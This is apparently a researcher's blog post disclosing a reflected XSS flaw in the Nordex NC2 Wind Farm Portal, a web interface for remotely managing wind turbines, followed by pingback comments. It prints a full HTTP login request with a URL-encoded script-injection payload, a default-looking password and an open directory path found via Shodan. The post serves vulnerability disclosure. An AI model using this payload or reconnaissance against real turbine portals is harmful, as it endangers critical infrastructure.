Another saved Shodan search this one for Nordex NC2 Wind Farm Portal software. Copied some of the software (version 11.06.11) over due to it allowing open directory browsing (go to /1_07_00/nc2/program_en/ for example) and checked for issues:
POST /login HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.16
Host: 1.2.3.4
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://1.2.3.4/11_06_11/index_en.jsp
Proxy-Connection: Keep-Alive
Content-Length: 129
Content-Type: application/x-www-form-urlencodedconnection=basic&userName=admin%27%22%29%3B%7D%3C%2Fscript%3E%3Cscript%3Ealert%28%27DF%27%29%3C%2Fscript%3E&pw=nordex&language=en
update: ICS-VU-308064
Tags: Shodan, Wind Power, XSS
The Darius Freamon Blog 
December 17, 2013 at 10:20 am |
[…] enables a user to control the settings and operations of wind turbines remotely. A researcher named Darius Freamon discovered a reflected XSS vulnerability in the software and published some details of it in the […]
December 17, 2013 at 11:39 am |
[…] enables a user to control the settings and operations of wind turbines remotely. A researcher named Darius Freamon discovered a reflected XSS vulnerability in the software and published some details of it in the […]
January 3, 2014 at 9:00 am |
[…] with all Nordex wind turbine generators to monitor and manage turbine production. The issue was first discovered and disclosed by independent researcher Darius Freamon on his blog. The Industrial Control Systems Cyber […]
November 2, 2021 at 9:34 pm |
[…] 6. Nordex NC2 Wind Farm Portal Reflected XSS | The Darius Freamon Blog […]
May 26, 2022 at 10:58 am |
[…] 5. Nordex NC2 Wind Farm Portal Reflected XSS | The Darius … […]